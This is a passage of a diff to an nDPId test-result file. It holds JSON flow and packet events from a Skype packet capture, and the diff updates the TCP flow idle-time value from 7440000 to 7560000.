00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FOcAAEARGqjAqAEi1cezjzLdnFYAKftynEgChXSqdM1qvdY\/tcyUx+hTJaaUvSW+LNUHctwmtBhJ"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQxNAAEAGFgrAqAEinTeCmcOJAbvJCUUsAAAAALAC\/\/85TwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675056,"flow_last_seen":1431969675056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675056,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431969675056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675056,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWxNAAEAGY87AqAEib91KL8OKAbuRyk0GAAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1431969675186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675186,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIgG7w4mX7uJ3yQlFLaASOJBqegAAAgQFrAQCCApOtN4hPiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1431969675186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675186,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04itAAEAGdv3AqAEinTeCmcOJAbvJCUUtl+7ieIAQECzBIgAAAQEICj4jCvdOtN4h"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1431969675201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675201,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIgG7w4gH6KF9F4LeCaASOJAKyQAAAgQFrAQCCApNhXK2PiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1431969675201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675201,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5VAAEAG45rAqAEinTc4ksOIAbsXgt4JB+ihfoAQECxhYwAAAQEICj4jCwVNhXK2"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1431969675353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIgG7w4qMyvZEkcpNB6ASOJB16gAAAgQFrAQCCApNhWBgPiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1431969675353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675353,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0A+1AAEAGuwDAqAEib91KL8OKAbuRyk0HjMr2RYAQECzL7gAAAQEICj4jC5tNhWBg"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQxNAAEAGFgrAqAEinTeCmcOJAbvJCUUsAAAAALAC\/\/85TwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675056,"flow_last_seen":1431969675056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675056,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431969675056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675056,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWxNAAEAGY87AqAEib91KL8OKAbuRyk0GAAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1431969675186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675186,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIgG7w4mX7uJ3yQlFLaASOJBqegAAAgQFrAQCCApOtN4hPiMKdQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1431969675186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675186,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04itAAEAGdv3AqAEinTeCmcOJAbvJCUUtl+7ieIAQECzBIgAAAQEICj4jCvdOtN4h"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1431969675201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675201,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIgG7w4gH6KF9F4LeCaASOJAKyQAAAgQFrAQCCApNhXK2PiMKdQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1431969675201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675201,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5VAAEAG45rAqAEinTc4ksOIAbsXgt4JB+ihfoAQECxhYwAAAQEICj4jCwVNhXK2"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1431969675353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIgG7w4qMyvZEkcpNB6ASOJB16gAAAgQFrAQCCApNhWBgPiMKdQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1431969675353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675353,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0A+1AAEAGuwDAqAEib91KL8OKAbuRyk0HjMr2RYAQECzL7gAAAQEICj4jC5tNhWBg"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rAwAAEAR7JDAqAEiQTffFTLdnFsAJTYGnEoCYEAkEhPrC3cXaZ2QhtIeOoxIY9w9Ekoojl8="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -504,12 +504,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3KwsAAEARbhfAqAEinTeCkjLdgQkAI6nfnE4CnxxG0E+kNYaCqSmEqqaVzyCf2xFtLT6I"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1431969675708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675708,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0poBAAEAGGHbAqAEib91KJsOLnE+UB73UG80ZgIAQECzH1wAAAQEICj4jDPtNf6NJ"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"PBXCt3IO0NQSxnP1CABFAAAoyPJAAPAGikIRrGQkwKgBIgG7w2hngP4KnAi0lFARn\/5c7gAAAAAAAAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1431969675708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675708,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0poBAAEAGGHbAqAEib91KJsOLnE+UB73UG80ZgIAQECzH1wAAAQEICj4jDPtNf6NJ"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"PBXCt3IO0NQSxnP1CABFAAAoyPJAAPAGikIRrGQkwKgBIgG7w2hngP4KnAi0lFARn\/5c7gAAAAAAAAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} 